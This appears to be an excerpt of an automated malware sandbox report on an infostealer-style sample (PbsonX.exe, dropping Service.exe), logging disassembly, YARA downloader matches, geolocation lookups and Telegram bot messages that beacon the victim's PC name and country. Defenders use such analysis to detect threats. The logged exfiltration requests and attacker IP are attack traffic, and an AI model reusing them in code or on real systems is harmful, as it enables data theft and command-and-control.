Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 06FBF471h 31_2_06FBF1C8
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 06FB31E8h 31_2_06FB2DC7
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 06FBF019h 31_2_06FBED70
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 06FBEBC1h 31_2_06FBE918
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 06FB31E8h 31_2_06FB3116

Networking
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\System32\wscript.exe Network Connect: 192.210.215.11 80 Jump to behavior
Uses the Telegram API (likely for C&C communication)
Source: unknown DNS query: name: api.telegram.org
Yara detected Generic Downloader
Source: Yara match File source: 2.2.PbsonX.exe.37f61d0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.PbsonX.exe.37b1db0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.PbsonX.exe.376d980.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.PbsonX.exe.382d410.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.PbsonX.exe.37e8fe0.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.PbsonX.exe.371d970.6.raw.unpack, type: UNPACKEDPE
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.4:49835 -> 142.250.110.109:587
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:835180%0D%0ADate%20and%20Time:%2028/08/2024%20/%2012:49:19%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20835180%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:835180%0D%0ADate%20and%20Time:%2028/08/2024%20/%2010:11:13%0D%0ACountry%20Name:%20%0D%0A%5B%20835180%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:835180%0D%0ADate%20and%20Time:%2028/08/2024%20/%2010:21:09%0D%0ACountry%20Name:%20%0D%0A%5B%20835180%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:835180%0D%0ADate%20and%20Time:%2028/08/2024%20/%2010:01:14%0D%0ACountry%20Name:%20%0D%0A%5B%20835180%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:835180%0D%0ADate%20and%20Time:%2028/08/2024%20/%2010:31:07%0D%0ACountry%20Name:%20%0D%0A%5B%20835180%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:835180%0D%0ADate%20and%20Time:%2028/08/2024%20/%2010:11:10%0D%0ACountry%20Name:%20%0D%0A%5B%20835180%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:835180%0D%0ADate%20and%20Time:%2028/08/2024%20/%2010:30:43%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20835180%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:835180%0D%0ADate%20and%20Time:%2028/08/2024%20/%2010:40:34%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20835180%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:835180%0D%0ADate%20and%20Time:%2028/08/2024%20/%2011:10:21%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20835180%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:835180%0D%0ADate%20and%20Time:%2028/08/2024%20/%2011:00:28%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20835180%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:835180%0D%0ADate%20and%20Time:%2028/08/2024%20/%2011:29:56%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20835180%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:835180%0D%0ADate%20and%20Time:%2028/08/2024%20/%2010:01:17%0D%0ACountry%20Name:%20%0D%0A%5B%20835180%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:835180%0D%0ADate%20and%20Time:%2028/08/2024%20/%2010:21:05%0D%0ACountry%20Name:%20%0D%0A%5B%20835180%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:835180%0D%0ADate%20and%20Time:%2028/08/2024%20/%2010:30:54%0D%0ACountry%20Name:%20%0D%0A%5B%20835180%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:835180%0D%0ADate%20and%20Time:%2028/08/2024%20/%2011:59:31%0D%0ACountry%20Name:%20%0D%0A%5B%20835180%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:835180%0D%0ADate%20and%20Time:%2028/08/2024%20/%2011:39:43%0D%0ACountry%20Name:%20%0D%0A%5B%20835180%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
